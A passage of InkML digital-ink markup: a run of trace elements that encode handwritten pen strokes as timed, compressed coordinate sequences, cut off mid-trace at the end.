  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="88640.3439">5229 4664 18 0,'-2'24'48'16,"2"3"-6"-16,4-1-5 0,-4-7-2 0,4 6 0 15,-3-7-6-15,3-1-15 0,0-3-14 0,-4-1-16 16,1-4-25-16,-1 1-43 0,0-3 19 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="88854.7736">5448 4663 50 0,'12'5'48'0,"-2"-2"-11"0,0 4-4 15,-2-3-8-15,0-1-14 0,-4-3-7 0,-2 3-23 16,-2-3-13-16,0 0-34 0,-14 1 15 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="89053.512">4668 4356 7 0,'28'13'45'0,"-1"0"-4"0,-2 6-13 0,-4-2-16 15,-1 6-24-15,-5 5-9 0,-6 1-21 0,4 2 9 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="90556.4336">5242 6737 22 0,'0'0'21'0,"-4"-2"0"0,4 2 1 16,0 0 1-16,0 0-4 0,0 0-6 0,0 0 1 0,0 0 1 15,0 0-5-15,0 0-3 0,0 0-2 16,0 0 2-16,0 0 1 0,0 0-4 0,0 0 0 15,0 0-6-15,0 0 2 0,0 0-1 0,0 0 1 16,0 0-3-16,0 0 2 0,0 0-6 0,10-3 5 0,-10 3-6 16,0 0 3-16,16 3 1 0,-5 0-4 0,1-3 4 15,5 5-6-15,5 0-2 0,6-1-1 16,0 3-10-16,1 1-24 0,2-4 11 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="96189.9054">3456 6813 3 0,'-2'-2'28'0,"2"2"2"0,0 0-4 0,-6-2 8 16,6 2-7-16,0 0-3 0,-2-4-1 15,2 4 0-15,0 0 3 0,0 0-4 0,0 0 4 16,0 0 0-16,0 0 2 0,-5-3-6 0,5 3 2 0,0 0 6 16,0 0-7-16,0 0 5 0,0 0-6 15,0 0 6-15,0 0 5 0,0 0 0 0,0 0-6 0,0 0 4 16,0 0 3-16,0 0 3 0,0 0 0 15,0 0 4-15,0 0-8 0,0 0-1 0,0 0-7 0,0 0 0 16,0 0-9-16,0 0-3 0,0 0 0 0,0 0 1 16,0 0 3-16,0 0-8 0,0 0-6 0,0 0 3 15,0 0-5-15,0 0 9 0,0 0-5 0,0 0 2 16,0 0-4-16,0 0 6 0,16 0-5 0,-16 0 2 16,14 1 0-16,-5-1 0 0,0 2 0 0,5-2-4 15,-1 1-1-15,0 2-1 0,2-3-4 0,1 2 4 16,2-2 7-16,-6 0-6 0,1 0 8 0,0 1-6 15,2-1 1-15,-2 1 0 0,-2-1-7 0,-2 0 9 16,2 0-6-16,-4 0 11 0,2 1-5 0,-4-1-5 16,3 0-2-16,-8 0-3 0,9-1 4 0,-9 1 8 15,8 1-6-15,-8-1 10 0,6 1-7 0,-6-1 4 16,0 0 5-16,0 0-3 0,9 2 1 0,-9-2 3 16,0 0 4-16,4 0 4 0,-4 0-2 0,0 0 0 15,0 0-1-15,0 0-6 0,0 0 5 0,0 0-5 16,0 0-9-16,3-5-5 0,-3 5 9 0,0 0 6 15,0 0-4-15,0 0-8 0,0 0 3 0,0 0-7 16,0 0 11-16,0 0-13 0,0 0 6 0,0 0-3 16,0 0-6-16,0 0-12 0,0 0-13 0,0 0-2 15,0 0-18-15,0 0-5 0,0 0-7 0,0 0-7 16,0 0-3-16,0 0-7 0,0 0-74 0,0 0-168 16,7-3 75-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="97297.5286">7344 5405 5 0,'0'0'11'0,"0"0"-5"16,0 0 3-16,0 0-4 0,0 0 0 0,0 0 5 16,-1-4-8-16,1 4-3 0,0 0-2 0,0 0 6 15,0 0-5-15,0 0-7 0,0 0-9 0,0 0 4 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="97992.4943">7346 5457 17 0,'0'0'19'0,"0"0"-2"0,0 0-3 16,0 0 3-16,0 0-6 0,0 0 3 0,0 0-8 15,0 0 2-15,0 0-1 0,0 0-1 0,0 0 3 16,0 0-7-16,0 0 3 0,0 0-5 0,0 0 2 15,0 0-4-15,0 0 6 0,0 0-1 0,0 0-2 16,0 0-1-16,0 0 0 0,0 0-1 0,0 0 1 16,0 0 3-16,0 0-5 0,0 0 4 0,0 0 1 15,0 0-4-15,0 0 5 0,0 0-4 0,0 0 1 16,0 0 2-16,0 0-2 0,0 0-1 0,0 0 0 16,0 0-3-16,0 0 5 0,0 0-1 0,0 0 0 0,0 0-3 15,0 0 0-15,0 0 3 0,0 0-7 0,0 0 7 16,0 0 4-16,0 0-5 0,0 0 2 15,0 0-4-15,0 0 1 0,0 0-1 0,0 0 3 16,0 0 2-16,0 0-1 0,0 0-4 0,0 0 2 0,0 0-4 16,0 0 4-16,0 0 3 0,0 0-3 0,0 0-2 15,0 0 3-15,0 0-1 0,0 0 1 0,0 0-1 16,0 0-3-16,0 0 3 0,0 0-2 0,0 0-2 16,0 0-1-16,0 0 3 0,0 0 1 15,0 0-6-15,0 0 7 0,0 0-10 0,0 0 2 0,0 0 5 16,0 0-4-16,-5 3 2 0,4 1-5 0,-3 1-8 15,2 0-19-15,-4-2 9 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="103989.8659">5924 6680 2 0,'0'0'21'15,"0"0"-2"-15,0 0-8 0,0 0 4 0,0 0 4 0,-4-9-3 16,4 9-6-16,0 0 0 0,0-4-3 0,0 4-2 16,0 0 3-16,-1-6-5 0,1 6 2 15,0-4 0-15,0 4-6 0,0-5-2 0,0 5-4 16,0 0-1-16,-3-5 1 0,3 5-4 0,-2-3-10 0,2 3-21 15,-3-2 11-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="106825.7666">4729 6264 21 0,'0'-9'24'0,"0"1"-3"0,1 4-4 0,-2-7 0 15,0 4-1-15,-2 0 3 0,2 0 6 0,-2-2-2 16,0 0-1-16,0 2-5 0,-2-2-2 0,0-1-4 16,-2 2-5-16,1-1 9 0,2-1-1 0,-2-1-2 15,-2-1 4-15,1 5-7 0,-4-7 8 0,2 5-2 16,-5-1-7-16,1-3-2 0,3 5 4 0,-4-3-1 16,1 0 1-16,-1 0-1 0,0 2-3 0,-1-3 4 15,3 5-11-15,-1-1 11 0,0 0-4 0,1 2 1 16,1-1-2-16,-1 1-5 0,2 0 6 0,-7-3-3 15,7 5-3-15,-8-5 1 0,4 2-1 0,-4-3-1 16,4 3 3-16,-3-1 0 0,-2 0-2 0,4 2 2 16,-3-2 0-16,0 2 1 0,-1 1-2 0,1-2-1 15,-1 2-1-15,1 0 0 0,0-3 2 0,-1 0-2 16,0 5 0-16,0-4 0 0,-3 1 2 0,3 1-12 16,0-1 10-16,1 2 0 0,-2-2-4 0,0 4 5 15,5-2 2-15,-6 1-1 0,2-1-4 0,1 4 3 16,-5-1-9-16,-5 1 6 0,-3 3 6 0,1 0-2 15,-3 0 2-15,2 0-1 0,0-1-9 0,3 2 5 16,5-2 3-16,4 1-8 0,0-2 1 0,2 2 2 16,4-3 2-16,0 0 4 0,1 1-4 0,-1-1 7 0,3 1-8 15,-3 0 6-15,1 0-5 0,1-1 0 16,2 3-1-16,0-2 5 0,1 0-5 0,0 1 0 16,1-1 4-16,-1 4-1 0,2-1-10 0,-2-1 10 15,2-1-3-15,1 3 1 0,0-1 2 0,0-1 5 16,-1 2-8-16,0-1 0 0,2 3 2 0,0-1 3 15,1-1-4-15,-1 2 0 0,0-1 1 0,0 2 3 16,-3 1 1-16,3-1-2 0,0 3-1 0,0-4-4 16,1 4 7-16,-1-4-9 0,1 4 7 0,-4-3-7 15,4 3 8-15,0-2-1 0,-1 2-1 0,3-3-1 0,-3 3 1 16,4 0 0-16,-4-2-1 0,4 3 1 16,0-2 2-16,0 5-6 0,-1-4 3 0,-2 4 2 15,2-2-4-15,1 4 1 0,0-1 3 0,0 0 4 16,0 2-5-16,-1-3 0 0,1 2-4 0,0-2 4 15,1 2 1-15,-1 1-4 0,0 1 1 0,1-2 1 0,2 2 4 16,-2-2-7-16,3 2 5 0,-4 0-1 0,3-1 3 16,-1 1-5-16,2-1 5 0,-4-1-2 0,5-1 2 15,-1 0-3-15,0 0-2 0,-2-4 2 16,2 3 1-16,0-3-5 0,0-1 4 0,0 1 5 16,0-2-4-16,-1 3 0 0,2-4 3 0,2 3-4 0,-3-2 3 15,1 0-4-15,0 0-1 0,-1-1 3 16,3 0-5-16,0 0 7 0,-1 6 0 0,1-5-2 15,1-2-6-15,0 2 5 0,1 0-7 0,-2-1 6 16,5 1 0-16,-3-1 0 0,4 1 1 0,1-1 1 16,-1 2-3-16,2-1 2 0,-2-1 0 0,2 1 3 0,1-1 4 15,0 0-5-15,2-1 2 0,0-1-5 0,1 0 0 16,-1 1 1-16,1-2 1 0,1 1 2 16,5 3 1-16,-2-4-3 0,2 1 1 0,2-3-7 15,0 1 0-15,-1 2 10 0,-6-4-7 0,8 1 2 0,-1-1-3 16,-5 4-3-16,5-4 9 0,-6 1-5 0,2-2 2 15,4-2-4-15,-7 0 1 0,8 0 15 0,-7 3-15 16,1-3-1-16,1 0 5 0,-1-3-4 0,-1 3-2 16,0-2-1-16,-1 0 3 0,1-1-2 15,-2-2 3-15,0 1-2 0,0 0-1 0,-1 1 1 0,0-9-2 16,0 8 5-16,-1-4-3 0,-2 0 7 0,2 1-4 16,-3-3 1-16,-3 3-3 0,-1-1-1 0,0 0 2 15,3-5 4-15,-2 1-4 0,-4 3 3 0,6-5-2 16,-7 3-3-16,2 0-1 0,0 2 4 0,-1-7-2 15,1 0 6-15,1 2-5 0,-4-2 5 0,1 0-3 16,1 0-10-16,-2-1 15 0,0-1-4 0,3 1-4 16,-6 1 6-16,2 0 1 0,0-3-2 0,1 3 1 15,-1-2-2-15,0-2 0 0,1 2 0 0,0-7-2 16,3 0 5-16,-4 7-5 0,-2-2 0 0,2 2-2 16,-1-1 2-16,2 2 2 0,-2-2-8 0,0 1 10 15,2-7-2-15,-2 9 1 0,-1-4-2 0,2 3 1 16,1-8-5-16,-2 7 4 0,2 0-1 0,-1 4-4 15,-1-2 9-15,0-2-8 0,1 1 3 0,-2 0 0 16,2 2 0-16,-1 3 1 0,0 1 2 0,-2-1 5 16,0 1 0-16,1-2-1 0,-2 3 4 0,0-2 0 15,0 2 0-15,0 0 15 0,-3 1-9 0,2 0-3 16,1-2-5-16,-4 2 5 0,1-1 6 0,0 1-13 16,1-1 0-16,-1 2-5 0,-1-2 12 0,-1 1-9 15,0-1-1-15,-1 1 0 0,1 1 3 0,-2-2-3 16,1 2 4-16,-2 1-6 0,2 1-5 0,0-3 7 15,-1 2-5-15,2-2 4 0,-5 2-1 0,6 3 0 16,-2-4 0-16,-2 1-10 0,-1 1 15 0,0-1-3 16,0 1-6-16,0 2 0 0,-4-4 4 0,3 3-5 15,-2-1 5-15,1 3-2 0,-2-2-2 0,1 0-1 16,0 2 7-16,-1 0-3 0,1 0-7 0,0-1 8 16,-2 0-1-16,2 3 0 0,0-1-5 0,-1-1 1 15,0 1 4-15,-1 0 0 0,1-1-9 0,-2 2 5 16,3-2 0-16,1 1 8 0,-4 1-1 0,3 0-3 15,-2 1 2-15,4 0-2 0,-2 0 5 0,1-1-5 16,-2 1 0-16,3 0-6 0,0 0 5 0,-2 0 3 16,2 0-3-16,0 0 3 0,-2 0-1 0,1 1-1 15,-2-1-1-15,-1 1 2 0,-3 0-4 0,2-1 7 16,2 1-6-16,0-1 3 0,1 1 1 0,0 1 0 16,-1-2-6-16,2 1-2 0,-2 0 3 0,0 2-3 15,2-2 5-15,-2 0-2 0,3 1-3 0,-2-1 6 16,2 2-1-16,-3-2-1 0,3 1-2 0,1 0 1 15,0 0 1-15,1 0 5 0,0-1-1 0,-1 2 2 16,1-1-6-16,0-1-2 0,-1-1 7 0,3 3 0 16,-2-1-3-16,2 0 5 0,-2 0-3 0,-1 1-4 15,1-1 0-15,-1 1 1 0,-2 2-3 0,2-1 3 16,-1-1 0-16,0 1 0 0,2-1 0 0,-1 2-2 16,-1 0 0-16,2-2 3 0,-1 3 0 0,4-4 2 15,-2 0-3-15,0 2 1 0,3 0-2 0,-1 2-1 16,-1-4 6-16,-1 2-2 0,2-1-2 0,1 4 0 15,-1-3 1-15,-1-2 0 0,1 4 0 0,-2 0-4 16,1-2 5-16,1 0 2 0,0 1-9 0,0 0 9 16,-1-1-3-16,0 1-5 0,0 0 4 0,1 0-1 0,-1-1 7 15,3-1-11-15,-4 1 11 0,1 2-6 16,2-4 3-16,-1 2-2 0,0-1-3 0,1 2 1 16,-3-3 1-16,4 2 1 0,-1-1 1 0,0 0 2 15,2-1-1-15,-2 0-3 0,4-2-2 0,-7 4 1 16,5-1 5-16,-1-1 0 0,-2 1-5 0,1 0 4 15,2-1 2-15,-1 1-1 0,-1 0-4 0,0 0-1 0,2 2-1 16,-2-2 1-16,-1-2 1 0,3 2-2 16,-1-1 2-16,3-2 3 0,-4 5-4 0,0-2 4 15,4-3-7-15,-1 4 3 0,-3-3 0 0,4-1-10 0,0 0 9 16,-4 5 2-16,4-5 1 0,-2 5 1 16,2-5-2-16,0 0 2 0,-3 3-6 0,3-3 6 15,0 0-8-15,0 0 7 0,-5 2 2 0,5-2 1 16,0 0-5-16,0 0-1 0,0 0 3 0,0 0 0 15,-2 2-1-15,2-2-1 0,0 0 5 0,0 0-5 0,-2 3 6 16,2-3-6-16,0 0 2 0,-2 4-2 0,2-4 3 16,-2 4 0-16,2-4 0 0,-1 4 3 15,1-4-3-15,-5 4-1 0,4-3 5 0,1-1-5 0,-3 5-1 16,2-1 0-16,-2 0-5 0,3-4 5 16,-4 4 1-16,3 0 1 0,-4-1 1 0,3 1 0 0,0 0-6 15,0-1 7-15,-1 0-4 0,-1 1-2 0,2 2 1 16,-1 0-1-16,-1-2 5 0,2 1 2 15,0 1-5-15,-1-1 4 0,-1-2-2 0,1 2 3 0,2 1-5 16,-3 0-3-16,2-2 4 0,-1 1-5 16,0 2 3-16,1-4 4 0,1 3-8 0,-2 1 8 0,2-2 0 15,-3 2-3-15,3 1-3 0,-3 0-1 0,3 0 3 16,-2 1-1-16,1 1 3 0,-1-2 0 0,2 2-1 16,-1 0 3-16,1 0-1 0,0 1-1 15,-1 0 3-15,2-1-3 0,-1 0 3 0,1 1-6 0,-1 0 6 16,0 3 0-16,1-3 1 0,-3 0-3 0,3 2-2 15,0-3 4-15,0 2-4 0,0-3 4 0,-1 2-4 16,2-2 3-16,-1 0-4 0,0 1 5 0,3 0-3 16,-2-3 1-16,1 4 2 0,0-5-7 15,-1 3-1-15,2-2-3 0,-2 3-2 0,3-4-3 0,0 3-3 16,1 0-2-16,1 0-3 0,0-1-5 0,0 1 0 16,-1-2-18-16,1 2-47 0,0-1 22 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114522.0636">3918 5410 5 0,'2'2'4'0,"-2"-2"-3"0,7 6 1 0,-5-3 0 16,4 1-1-16,-1 2 0 0,1-3 2 0,1 3 0 15,1-1 2-15,1 0-4 0,-4 2 3 0,0-4-2 16,4 4-2-16,-4-4 2 0,4 4 4 0,-1-3-4 16,-3 1 1-16,4-2 3 0,0 3-2 0,-2-1 2 15,3 0 4-15,0 0 6 0,1-1 0 0,7 1 5 16,-5 0-2-16,5-1 2 0,1 0 5 15,0 0-3-15,4-1-4 0,-5 1-3 0,4-2 1 0,4 3-1 16,-3-2-1-16,4-3-3 0,4 3 8 0,1 0-5 16,1-1-3-16,0-2 5 0,4-1 0 0,1 2-4 15,0-1 1-15,0 0-2 0,-2 0 1 0,1-1-4 16,-2 0 7-16,0 1-3 0,0 1-1 0,-1-4-3 16,2 5 4-16,1-1-7 0,-1-1 7 0,16 0-1 15,-13-1 0-15,14-2-8 0,-4 3 5 0,-7 0-3 16,9-3-1-16,0 1-1 0,-11 2 4 0,11-1-7 15,-11 1 2-15,-2 0 4 0,0 0-1 0,-1 1 3 16,-2 1-4-16,-3 1-3 0,2 1-2 0,-2-1 8 16,-2 1-7-16,3 1 6 0,-5 0-1 0,4-2-11 15,0 3 13-15,-1-3-5 0,-1 3-5 0,1 0 2 16,-2-1 5-16,1-2-1 0,-2 3-3 0,0 0 1 16,-6-2-3-16,-2 0 4 0,1 2-3 0,-1 0 6 15,-1-2-6-15,-1 1 5 0,0-2-2 0,0 1-6 16,-5-1 10-16,1 0-5 0,-4-2 0 0,4 3 1 15,-2-2 0-15,-1-1-6 0,-2 2 3 0,-1-2 1 16,-1 1-6-16,0-1-20 0,-1 0-35 0,-2 2-41 16,0 1-109-16,-2 1 49 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="126597.1599">7778 6861 5 0,'13'4'12'15,"-1"-2"-3"-15,4 1 1 0,0 0-3 0,3 1 5 16,1 1-6-16,-2-3 10 0,1 0-12 0,1-1 2 16,-1-1-1-16,0 0 2 0,-3-1-2 0,-2 1 2 15,-1-2 0-15,1 1-2 0,-1-2 3 0,-3-3 4 16,2 2-1-16,-2-1 3 0,0 0 0 0,0-2 1 16,-1 0 4-16,-1-1 5 0,0 1 2 0,-2-2 0 15,3 0-3-15,-5 2 5 0,1-3-3 0,0 3-2 16,-2-3 1-16,-2 5-5 0,3-2 1 0,-3-1 4 15,-1 1-8-15,0-5 1 0,0 7-10 0,0-5 2 16,0 3 7-16,-1-1-5 0,-3 2-4 0,0 1 10 16,2-2-8-16,-1 1-7 0,-2 0 1 0,0 0 0 0,-2 2 5 15,1-1-11-15,1 3 9 0,-3-4-1 16,3 3-2-16,-3 0-4 0,2 1 4 0,1 0 5 16,-3 1-5-16,8 1-3 0,-13 1-1 0,5 1 0 15,1-1 0-15,-1 3 4 0,1-1-3 0,-2 3-3 0,4-2 1 16,-2 2 2-16,3-3 0 0,-1 2-2 15,0 1 4-15,3 0-5 0,-2 0 0 0,1-1 0 16,0 1 6-16,1 2-3 0,-2-3-3 0,3 4 1 16,0-3-2-16,0 3 3 0,1-2-1 0,0 0-1 0,0-1 1 15,0 1 0-15,1-2 3 0,-1 2-3 0,1-3-1 16,0-1 6-16,1 3-12 0,-1-4 10 0,0 0 3 16,-1-2 0-16,3 6-1 0,-3-6 2 15,2 2 0-15,-2-2 9 0,0 0-4 0,0 0-6 0,4 1 1 16,-4-1 3-16,0 0 0 0,10-7-3 0,-5 2 2 15,2 0-2-15,-1-3 5 0,2 0-16 0,2-1 13 16,-5-1-6-16,0 2 3 0,3 1 3 16,-4-3-9-16,0 0 0 0,0 1 0 0,-2 3 5 0,2-2 4 15,-4 3 3-15,0-2-3 0,0 2 13 0,0 0-9 16,0-1-3-16,0 6-2 0,-3-6-4 0,0 2 10 16,-5 3-2-16,2-1-14 0,-5 1-13 0,0 4-5 15,-3-2-14-15,-7 6-26 0,-4 5-47 16,-6 2-116-16,-1 2 52 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="170497.9546">3612 8901 30 0,'0'0'71'0,"0"0"-4"0,9-4-5 0,-4 4-1 0,1 0-12 16,2 0 2-16,3 0-9 0,2 0-5 16,0 2-12-16,6-1 7 0,3 2 2 0,-3-2-10 15,2 1-4-15,3 1-1 0,4 1 7 0,-2-1-7 16,3 2 1-16,-2 1-1 0,1 2-26 0,-2-1-10 0,-5 1-20 15,6 0-72-15,-1 2-116 0,1-1 52 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="171587.9886">7767 8968 20 0,'9'-1'29'0,"1"2"-11"0,0 0 10 16,1-1-5-16,1 0-4 0,-3 2 3 0,4-2-2 15,-2 2-1-15,2-1 1 0,1-1-3 16,-1 2-7-16,1-1 8 0,-2 0 4 0,1-1-4 0,0 2-6 16,2-1 6-16,-1-1 6 0,2 0-4 0,2 0 5 15,-5 1 0-15,2-1-4 0,-1 0 1 16,0 0-5-16,3-1-4 0,-2 1 8 0,2 0 2 0,-2 0-9 16,-2-1 1-16,5-1 7 0,-5 1-1 0,1-2-7 15,-3 3 5-15,1-1-1 0,0 1 4 0,0-2-2 16,1-1 6-16,-2 2 6 0,2-1-9 0,-1-2 4 15,-1 1-3-15,3 0-3 0,0 2-2 0,-1-1-4 16,0 0 1-16,-3-1-4 0,4 2 18 0,-5-3-9 16,4 1-1-16,-4 0-1 0,1 2 7 0,-1-1-13 15,-3 0-2-15,3 0 3 0,-2 1 5 0,-2-1-1 16,0 1-11-16,-5 1 3 0,10-2 3 0,-6 1-12 16,-4 1 2-16,8-1-14 0,-8 1-21 0,3-2-33 15,-3 2-109-15,0 0-188 0,0 0 84 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="178236.0161">4551 11060 22 0,'0'0'57'0,"-1"-7"-7"15,-3 3-5-15,2 1 2 0,1 0-2 0,1 3 3 16,-3-6-1-16,3 6-4 0,-1-6-4 0,1 6-10 15,-3-2 6-15,3 2-6 0,-1-3-2 0,1 3-5 16,0 0 1-16,0 0-14 0,0 0-1 0,0 0 2 16,0 0 6-16,0 0-6 0,0 0-1 0,1-5-6 15,-1 5 2-15,0 0 0 0,0 0 1 0,13 0-6 16,-6 0 13-16,1-2-6 0,1 1 4 0,1 1 5 16,4 0-7-16,-1-1-2 0,1 1 1 0,5 1 0 15,1-1 3 1,-1 1-3-16,1 1-2 0,1 0-5 0,8 1 14 0,2-3 4 0,2 0 11 0,-1 3-4 15,10-3-6-15,-2 2 4 0,13 0 2 0,1 2 5 16,-16-2-6-16,15 2-2 0,-2-1-1 0,1-1-4 16,-12 1 3-16,0 4-10 0,11-3 6 0,-13 2 0 15,0 2-3-15,3-2 4 0,-5-1-4 0,15 2 3 16,-13-1 1-16,0 2-3 0,-3-2 5 0,1 0-1 16,-2 1-6-16,4-2 2 0,-6 2-8 0,-3 0-5 0,0 0 7 15,-3-1-7-15,1 4 5 0,0-1-42 16,-8-1-31-16,5 3-41 0,-7-3-81 0,-3 3-201 15,-7 1 89-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="182484.7139">6375 11936 24 0,'0'0'32'0,"0"0"-7"0,0 0 7 16,0 0-2-16,9 7 13 0,-5-5-8 0,1 0 8 15,5 1-3-15,-2 2 8 0,3 2 5 16,1-1 5-16,3 1 2 0,3 0-11 0,-2 1-6 0,1 2 14 16,2-3-8-16,2 4-3 0,-2-2-11 0,9 1 7 15,2 1-3-15,0-1-2 0,1-3-3 0,1 0-3 16,1 0-2-16,-1-1-6 0,0 0-1 0,3 1 12 15,0-4-10-15,3 4 15 0,2-2-7 16,-3 0 1-16,3-3-6 0,12 5-8 0,-13-4 11 0,12 4-6 16,-14-4-1-16,15 0-9 0,4 4 3 0,-2-4 1 15,1-1-2-15,0-2 2 0,-15 0-2 0,-2 0 1 16,4-5 2-16,8-2 5 0,-13 3 0 0,4 1 3 16,-3-5-2-16,0 1 6 0,0 1 0 0,-1-4 0 15,-4 1 6-15,-1-1-6 0,3 3 14 0,-7-4 2 16,0 2-4-16,-1 0 2 0,-7 2-3 0,7-4 0 15,-8 6-11-15,-1 0 10 0,1 0 11 0,-5 1 1 16,-4-1 4-16,1 1-3 0,1 0-2 0,-3-2-3 16,2 2-7-16,-5 1-2 0,-1 2-4 0,0-2-6 15,2-1-1-15,-4 3-3 0,1-1-5 0,-4 2 0 16,4-3 0-16,-4 3-3 0,0 0-1 0,6-2-3 16,-6 2-5-16,0 0-15 0,4-2-14 0,-4 2-24 15,0 0-24-15,0 0-20 0,0 0-26 0,-15-6-22 16,11 5-19-16,-4 1-10 0,-3 0-156 0,-2 1-346 15,0 2 153-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="183468.3827">7018 12426 11 0,'4'-1'20'15,"-4"1"-3"-15,6-3 2 0,-6 3 7 16,8-1 4-16,-8 1 6 0,6-1 2 0,-6 1 1 16,3-2 0-16,-3 2-3 0,0 0-7 0,0-5-8 15,0 5-2-15,0 0-5 0,0 0-3 0,0 0-3 0,0 0-6 16,-13-5-6-16,9 4-5 0,0-1-7 0,4 2-3 16,-6-1 1-16,2-2-7 0,4 3-6 15,-10 0-19-15,10 0-52 0,-13 0 24 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="186108.4806">3733 12868 24 0,'0'0'43'16,"0"0"4"-16,-9 0-7 0,9 0 8 0,-6-2-8 16,6 2 5-16,0 0-5 0,0 0 4 0,-9 0-5 15,9 0-2-15,0 0-4 0,0 0-1 0,-5-2-10 16,5 2-3-16,0 0 5 0,-5-1-1 0,5 1 2 15,0 0-5-15,0 0 6 0,0 0 0 0,0 0 0 16,0 0-13-16,0 0 3 0,0 0-3 0,0 0-10 16,0 0 11-16,0 0-10 0,0 0 3 0,0 0-1 15,0 0-2-15,0 0 1 0,0 0 0 0,0 0-4 16,0 0 4-16,0 0-11 0,0 0 9 0,0 0-1 16,0 0-1-16,0 0-3 0,0 0 10 0,0 0-6 15,0 0 0-15,0 0-3 0,0 0 5 0,0 0-8 16,0 0 9-16,0 0-12 0,0 0 9 0,0 0-6 15,0 0 8-15,0 0-1 0,0 0 1 0,0 0 0 16,0 0-9-16,0 0 1 0,0 0-1 0,0 0 2 16,0 0 5-16,0 0-5 0,0 0 7 0,0 0 0 15,0 0 4-15,15 12 11 0,-6-8-7 0,0 2 6 16,2-2 4-16,1 1-2 0,-3 2-3 0,5 0-1 16,-1 1 8-16,5 0 12 0,-2 1-7 15,2 1-2-15,-1-3-1 0,-2 1-6 0,1-3-3 0,-5 4 0 16,7-2 3-16,-5-4-2 0,2 6-3 0,-2-2-1 15,1-4 13-15,0 5-7 0,4-3 4 0,1 1-2 16,-2-2 2-16,1-1-7 0,-3 2 10 0,-1-1-10 16,-1 1-4-16,1-3 2 0,2-1-1 0,2 3 3 0,-1-2 0 15,2 1 5-15,-1 1 1 0,4 1-8 16,-3-1 9-16,0 1-3 0,0-3-4 0,3 0-2 16,-1 4 0-16,0-5 2 0,2 2-7 0,-5-1 1 15,5 3 1-15,0-3-2 0,4 4-1 0,1 2 2 0,-6-5-10 16,5 4 8-16,-6-4 0 0,0-1 0 0,-2 2-2 15,0-1 0-15,3 4 0 0,-4-4-3 16,2 1 2-16,-1 1-2 0,1 0 4 0,-1-2-7 16,-1-2-1-16,-1 3 5 0,1 0-1 0,-4-2-2 15,4 2 5-15,0-1-3 0,1-2 11 0,2 1 7 0,-2 0-3 16,3-2-3-16,-6 0 7 0,3 0-2 0,0 0-2 16,2-2-1-16,-6 2 0 0,3-2-2 15,0 2 1-15,-1-3 1 0,-2 2-3 0,-2 0-2 16,1-4-1-16,3 3 0 0,-5 0 3 0,1-1-7 0,0 1 0 15,0 0-2-15,-3 1 7 0,3-3-4 0,-4 3-5 16,-2-1 3-16,5-1 0 0,-5 2-5 0,0-2 1 16,-1 2 2-16,2-1-1 0,-2 2 1 0,-6 0-3 15,8-1 3-15,-8 1-4 0,5-5 2 0,-5 5 0 16,4-1-2-16,-4 1 2 0,0 0-1 0,0 0-1 16,0 0 4-16,0 0-4 0,8 0-15 0,-8 0-16 15,0 0-25-15,0 0-11 0,0 0-31 0,0 0-26 16,0 0-27-16,0 0-128 0,0 0-301 15,0 0 133-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="187802.2943">3425 10210 80 0,'-14'0'80'0,"-3"-2"-7"0,4 2-12 0,-6 0-1 16,6 0-6-16,-5 1-20 0,0 0 4 0,4 2-3 16,2-1-14-16,0 1 11 0,-1 2-4 0,-4 1-2 15,2 2-6-15,1 1-4 0,2-1-10 0,3 1 11 16,-3 5-9-16,1-1 3 0,1 0 2 0,0 2-8 16,0 0 0-16,2 0 11 0,2-1-4 0,-2 3-6 15,4 0-3-15,-1-1 0 0,4 1 2 0,-2-1-4 16,3-2 1-16,0 4 4 0,3-1-6 0,-1 0 4 15,5 1-8-15,3 4 1 0,3 2 5 0,3-2-3 16,1 4 2-16,2-2-5 0,0 3 6 0,7-1 4 16,-1 0-1-16,11 8-3 0,0-3 8 0,-5-7-13 15,7 5 3-15,5 2 5 0,-2-1-5 0,5-3 0 16,-1-2 8-16,4 0-4 0,-2 0 0 0,1 0-3 16,4 2 7-16,0-4-2 0,2-1-1 0,-1 2 1 15,5-1 0-15,-7-1-7 0,1 0 8 0,2-1-1 16,0-5-3-16,-2 3 0 0,2-2 0 0,-3-2 4 15,0-1-4-15,-11-7 0 0,1-3 4 0,-3 0-6 16,13 0 2-16,-13-3 1 0,2-2 6 0,-2-3-2 16,-2-1 4-16,1-3 1 0,-5-3-5 0,0 0 1 15,0-1-5-15,0-1 4 0,-4-2-3 0,-2 1-1 16,-6-4-2-16,3 2 8 0,-9 2-5 0,-2-2 3 16,-1 0 3-16,-1-2-5 0,-1-6 4 0,0 1-5 15,-2-2 2-15,-2 1-7 0,-5-2 10 0,-5 0-2 16,-3-1-9-16,0-1 0 0,-2 0-4 0,-9-3 12 15,-5-9-8-15,-10 2 0 0,1 1 7 0,0-1-7 16,-3 3-2-16,-1-1-3 0,-8 1 16 0,3 2 3 16,-2 1 5-16,-4-2-1 0,1 4-5 0,-3 1 9 15,2-3-2-15,-2 6 18 0,1-1 3 0,-1 3 2 16,3-1-13-16,-3 3 0 0,1 6-4 0,-2-1 8 0,14 4-10 16,-1 4-3-16,2-3 0 0,-2 5-6 15,2 1 5-15,-1 0-6 0,-1 1-5 0,1 3 3 16,-3 1 0-16,4-1-10 0,3 2 3 0,1-3 3 15,0-1 0-15,4 1 0 0,1-3-8 0,7 3 0 0,-1 0 11 16,9 0-16-16,-1 1 2 0,0-2-13 0,1-1-28 16,3 